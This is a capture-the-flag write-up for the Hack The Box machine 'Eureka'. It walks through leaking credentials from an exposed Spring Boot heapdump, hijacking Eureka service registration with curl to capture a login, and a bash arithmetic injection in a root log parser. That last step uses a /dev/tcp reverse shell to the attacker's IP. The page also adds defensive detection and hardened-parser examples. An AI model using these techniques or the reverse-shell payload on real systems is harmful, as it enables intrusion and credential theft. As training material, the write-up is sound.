Eureka - Write-Ups

The document details a penetration testing write-up for the Hack The Box machine 'Eureka'. It outlines the reconnaissance phase using tools like nmap and dirsearch, identifies vulnerabilities in the Spring Boot application, and describes the exploitation process to gain access to user and root accounts. Key findings include sensitive information leaks and the use of specific credentials to access the system and escalate privileges.

Uploaded by peter.nechala

Write-Ups

🔋 HACK THE BOX 💻 MACHINES


⚜️ Eureka
https://app.hackthebox.com/machines/Eureka

Recon
Using the Scripts/Functions/Tools

nmap -sCV -T4 <ip> -oA <file>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA)
|   256 90:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA)
|_  256 94:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://furni.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Adding new hosts

/etc/hosts entry

10.129.242.192 eureka.htb furni.htb

Furni-Website

➜ eureka dirsearch -u http://furni.htb/ -e php,html,txt -t 50

Extensions: php, html, txt | HTTP method: GET | Threads: 50 | Wordl

Output File: /mnt/e/hacking/hackthebox/Machines/eureka/reports/http_

Target: http://furni.htb/

[22:17:19] Starting:
[...]
[22:17:27] 200 - 2KB - /actuator
[22:17:27] 400 - 105B - /actuator/;/sso
[22:17:27] 400 - 115B - /actuator/;/springWebflow
[22:17:27] 400 - 112B - /actuator/;/statistics
[22:17:27] 400 - 113B - /actuator/;/ssoSessions
[22:17:27] 400 - 108B - /actuator/;/status
[22:17:27] 400 - 112B - /actuator/;/threaddump
[22:17:27] 400 - 107B - /actuator/;/trace
[22:17:27] 200 - 20B - /actuator/caches
[22:17:27] 200 - 6KB - /actuator/env
[22:17:27] 200 - 2B - /actuator/info
[22:17:27] 200 - 467B - /actuator/features
[22:17:27] 200 - 76MB - /actuator/heapdump
[22:17:27] 200 - 3KB - /actuator/metrics
[22:17:27] 200 - 54B - /actuator/scheduledtasks
[22:17:28] 200 - 198KB - /actuator/beans
[22:17:28] 400 - 108B - /actuator/sessions
[22:17:28] 405 - 114B - /actuator/refresh
[22:17:28] 200 - 96KB - /actuator/loggers
[22:17:29] 200 - 15B - /actuator/health
[22:17:29] 200 - 35KB - /actuator/mappings
[22:17:29] 200 - 180KB - /actuator/conditions
[22:17:29] 400 - 106B - /admin/%3bindex/
[22:17:30] 200 - 824KB - /actuator/threaddump
[22:17:30] 400 - 98B - /admin;/
[22:17:31] 400 - 98B - /Admin;/
[22:17:31] 200 - 36KB - /actuator/configprops
[...]

Leaking information because of misconfigured Spring Boot Actuators

http://furni.htb/actuator/env

Checking a list of common actuator endpoints:

/actuator/env
/actuator/auditevents
/actuator/beans
/actuator/caches
/actuator/configprops
/actuator/flyway
/actuator/health
/actuator/heapdump
/actuator/httptrace
/actuator/info
/actuator/integrationgraph
/actuator/liquibase
/actuator/configprops
/actuator/shutdown

We find a heapdump at http://furni.htb/actuator/heapdump
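From the defender's side, the same exposure is easy to spot in the web server logs. As an added example (my own code, not part of the original write-up): a small check over nginx access-log lines in the combined format, constructed here using the actuator paths dirsearch found above, that flags successful requests to the endpoints which leak memory or configuration. The severity labels and the sample lines are my own assumptions.

```shell
#!/bin/bash
# Constructed nginx access-log lines (combined log format) for the furni.htb
# vhost; the paths are the actuator endpoints dirsearch listed above.
ACCESS_LOG=$(mktemp)
cat > "$ACCESS_LOG" <<'EOF'
10.10.14.71 - - [27/Apr/2025:22:17:27 +0000] "GET /actuator/env HTTP/1.1" 200 6144 "-" "dirsearch/0.4.3"
10.10.14.71 - - [27/Apr/2025:22:17:27 +0000] "GET /actuator/heapdump HTTP/1.1" 200 79691776 "-" "dirsearch/0.4.3"
10.10.14.71 - - [27/Apr/2025:22:17:29 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "curl/8.5.0"
10.10.14.71 - - [27/Apr/2025:22:17:30 +0000] "GET /admin;/ HTTP/1.1" 400 98 "-" "dirsearch/0.4.3"
10.10.14.50 - - [28/Apr/2025:09:01:12 +0000] "GET /actuator/heapdump HTTP/1.1" 403 162 "-" "Mozilla/5.0"
EOF

# Print one line per successful (200) actuator request: "<severity> <client> <path>".
# heapdump/threaddump hand over process memory (the oscar190 password came
# from there); env/configprops/beans/mappings/loggers expose configuration;
# any other actuator hit is reported as INFO. Non-200 responses are ignored,
# so once the endpoints are closed (deny /actuator/ in nginx, or limit
# management.endpoints.web.exposure.include to health,info in Spring Boot)
# the same probe raises nothing; the 403 line simulates that state.
sensitive_actuator_hits() {
    awk '$9 == 200 && $7 ~ /^\/actuator\/(heapdump|threaddump)/ { print "CRITICAL", $1, $7; next }
         $9 == 200 && $7 ~ /^\/actuator\/(env|configprops|beans|mappings|loggers)/ { print "HIGH", $1, $7; next }
         $9 == 200 && $7 ~ /^\/actuator\// { print "INFO", $1, $7 }' "$1"
}

# Number of CRITICAL findings, usable as an alert threshold.
critical_count() {
    sensitive_actuator_hits "$1" | grep -c '^CRITICAL'
}

sensitive_actuator_hits "$ACCESS_LOG"
```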

Using a script written with the help of ChatGPT, we find a password:

#!/bin/bash
# Quick search for credential-like strings in a JVM heap dump.
# Lines marked "cut off in the original" were truncated at the page
# margin in the write-up and are closed here so the script runs.

# Usage check
if [ $# -lt 1 ]; then
    echo "Usage: $0 <heapdump-file>"
    exit 1
fi

HEAPDUMP="$1"
OUTPUT="sensitive_findings.txt"

# Colors
RED='\033[1;31m'
GREEN='\033[1;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

echo "[*] Extracting and searching in $HEAPDUMP..."

# Start with an empty results file
: > "$OUTPUT"

# Search for sensitive patterns (second alternative cut off in the original)
strings "$HEAPDUMP" | grep -Ei 'password[ =:][^[:space:]]+|passwd[ =:][^[:space:]]+' >> "$OUTPUT"

echo "[*] Search completed! Found $(wc -l < "$OUTPUT") potential secrets"
echo

# Pretty print
while IFS= read -r line; do
    if echo "$line" | grep -iq 'password\|passwd\|pwd'; then
        echo -e "${RED}[PASSWORD FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -iq 'secret\|token\|key\|credential'; then   # list cut off in the original
        echo -e "${GREEN}[TOKEN/SECRET FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -qE 'AKIA[0-9A-Z]{16}|ASIA[0-9A-Z]{16}'; then
        echo -e "${GREEN}[AWS KEY FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -qE '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}'; then   # TLD part cut off in the original
        echo -e "${GREEN}[EMAIL FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -qE '([0-9]{4}[- ]?){3}[0-9]{4}'; then
        echo -e "${GREEN}[CREDIT CARD?]${NC} ${YELLOW}${line}${NC}"
    else
        echo -e "${YELLOW}[OTHER]${NC} $line"
    fi
done < "$OUTPUT"

echo
echo "[*] Full results also saved in: $OUTPUT"

[..]
[PASSWORD FOUND] {password=0sc@r190_S0l!dP@sswd, user=oscar190}!,
[..]

User
➜ eureka ssh oscar190@furni.htb
oscar190@furni.htb's password: 0sc@r190_S0l!dP@sswd
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-214-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Sun 27 Apr 2025 09:00:04 PM UTC

System load: 0.0


Usage of /: 63.8% of 6.79GB
Memory usage: 47%
Swap usage: 0%
Processes: 244
Users logged in: 0
IPv4 address for eth0: 10.129.182.126
IPv6 address for eth0: dead:beef::250:56ff:fe94:4834

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

2 additional security updates can be applied with ESM Apps.


Learn more about enabling ESM Apps service at https://ubuntu.com/esm

Last login: Sun Apr 27 21:00:06 2025 from 10.10.14.71


oscar190@eureka:~$

We find another password in the application.yml of the Eureka-Server:

oscar190@eureka:/var/www/web/Eureka-Server$ grep -Ei -C 5 'password
name: "Eureka Server"

security:
user:
name: EurekaSrvr
password: 0scarPWDisTheB3st

server:
port: 8761
address: 0.0.0.0

nmap-full-scan
The full port scan shows the other HTTP server, Eureka, on port 8761, the same port as in the configuration above.

Eureka-Server
Using these credentials we can log in.

Register a new fake service, following the "Hacking Netflix Eureka" article as a template.

Replace YOURIP with the address of your listener.

curl -X POST http://EurekaSrvr:0scarPWDisTheB3st@furni.htb:8761/eureka/apps/USER-MANAGEMENT-SERVICE \
  -H 'Content-Type: application/json' -d '{
  "instance": {
    "instanceId": "USER-MANAGEMENT-SERVICE",
    "hostName": "YOURIP",
    "app": "USER-MANAGEMENT-SERVICE",
    "ipAddr": "YOURIP",
    "vipAddress": "USER-MANAGEMENT-SERVICE",
    "secureVipAddress": "USER-MANAGEMENT-SERVICE",
    "status": "UP",
    "port": { "$": 8081, "@enabled": "true" },
    "dataCenterInfo": {
      "@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
      "name": "MyOwn"
    }
  }
}'

After a while a login request carrying a username and password arrives on our listener, because requests for USER-MANAGEMENT-SERVICE are now routed to our host:

➜ eureka rlwrap nc -nlvp 8081


listening on [any] 8081 ...
connect to [10.10.14.71] from (UNKNOWN) [10.129.16.221] 50338
POST /login HTTP/1.1
X-Real-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1,127.0.0.1
X-Forwarded-Proto: http,http
Content-Length: 168
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image
Accept-Language: en-US,en;q=0.8
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: SESSION=NTI4MDg3OTgtM2E3MS00ZmE0LWFkYmQtYjQ1NWRlMjM4NDdj
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
Forwarded: proto=http;host=furni.htb;for="127.0.0.1:56148"
X-Forwarded-Port: 80
X-Forwarded-Host: furni.htb
host: 10.10.14.71:8081
username=miranda.wise%40furni.htb&password=IL%21veT0Be%26BeT0L0ve&_c

After URL-decoding the password with CyberChef, we log in as miranda-wise and get the user flag:

➜ eureka ssh miranda-wise@furni.htb
miranda-wise@furni.htb's password: IL!veT0Be&BeT0L0ve
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-214-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Thu 10 Apr 2025 07:41:57 AM UTC

System load: 0.04


Usage of /: 84.1% of 8.02GB
Memory usage: 44%
Swap usage: 0%
Processes: 248
Users logged in: 1
IPv4 address for eth0: 10.129.232.19
IPv6 address for eth0: dead:beef::250:56ff:feb9:f97

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

2 additional security updates can be applied with ESM Apps.


Learn more about enabling ESM Apps service at https://ubuntu.com/esm

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts

Last login: Mon Apr 28 16:17:19 2025 from 10.10.14.71


miranda-wise@eureka:~$

Root
Checking for processes running with root privileges shows a log_analyse.sh:

ps -eo user,pid,comm | grep '^root'


[..]
root 4105259 log_analyse.sh
root 4105350 log_analyse.sh

Searching for log_analyse.sh

miranda-wise@eureka:/$ find . -name log_analyse.sh


find: ‘./boot/lost+found’: Permission denied
find: ‘./var/tmp/systemd-private-83645e554a1047198652b4
[..]
./opt/log_analyse.sh

In that file at analyze_http_statuses() we can

code=$(echo "$line" | grep -oP 'Status: \K.*')

miranda-wise@eureka:~$ rm -f /var/www/web/user-management-service/log/application.log
miranda-wise@eureka:~$ echo 'HTTP Status: x[$(/bin/bash -i >& /dev/tcp/10.10.14.71/1337 0>&1)]' > /var/www/web/user-management-service/log/application.log

➜ eureka rlwrap nc -nlvp 1337


listening on [any] 1337 ...

connect to [10.10.14.71] from (UNKNOWN) [10.129.16.221] 41958


bash: cannot set terminal process group (1726439): Inappropriate ioc
bash: no job control in this shell
root@eureka:~#
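The root step works because a value grepped out of a user-writable log ends up in a bash arithmetic context. As an added example (my own code, not the box's log_analyse.sh): the parsing pattern from the page beside a hardened version. The page shows only the grep, so the numeric [[ ... -ge ... ]] comparison in the vulnerable function is my assumption about how the extracted value is used, which is what the x[$(...)] payload relies on; the log lines are constructed and the payload line carries a harmless command.

```shell
#!/bin/bash
# Constructed application.log lines in the shape the cron job parses; the
# last one has the payload shape from the write-up with a harmless command.
APP_LOG=$(mktemp)
cat > "$APP_LOG" <<'EOF'
2025-04-28 16:20:01 INFO  GET /login - HTTP Status: 200
2025-04-28 16:20:02 INFO  GET /missing - HTTP Status: 404
2025-04-28 16:20:03 INFO  POST /login - HTTP Status: 200
2025-04-28 16:20:04 INFO  GET /x - HTTP Status: x[$(echo injected)]
EOF

# VULNERABLE (for contrast only, never called here): `\K.*` accepts any text
# after "Status: ", and [[ ... -ge ... ]] evaluates that text as an
# arithmetic expression, where a subscript such as x[$(cmd)] is expanded.
# Whoever can write the log therefore runs cmd with the parser's privileges,
# root in this case. (Assumed comparison form; the page shows only the grep.)
vulnerable_count_2xx() {
    n=0
    while IFS= read -r line; do
        code=$(echo "$line" | grep -oP 'Status: \K.*')
        if [[ "$code" -ge 200 && "$code" -lt 300 ]]; then n=$((n + 1)); fi
    done < "$1"
    echo "$n"
}

# HARDENED: accept only a three-digit code at the end of the line, classify it
# with a pattern match instead of arithmetic, and count anything else as
# malformed without ever evaluating it. Output: "<2xx count> <malformed count>".
safe_count_2xx() {
    n=0; bad=0
    while IFS= read -r line; do
        code=$(printf '%s\n' "$line" | sed -n 's/.*Status: \([0-9][0-9][0-9]\)$/\1/p')
        case "$code" in
            2[0-9][0-9])     n=$((n + 1)) ;;
            [0-9][0-9][0-9]) ;;                  # valid code, but not 2xx
            *)               bad=$((bad + 1)) ;; # missing or malformed, skipped
        esac
    done < "$1"
    echo "$n $bad"
}

safe_count_2xx "$APP_LOG"
```

Running the parser as an unprivileged user, rather than root over a log the web user can write, removes the remaining impact even if the input validation were bypassed.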
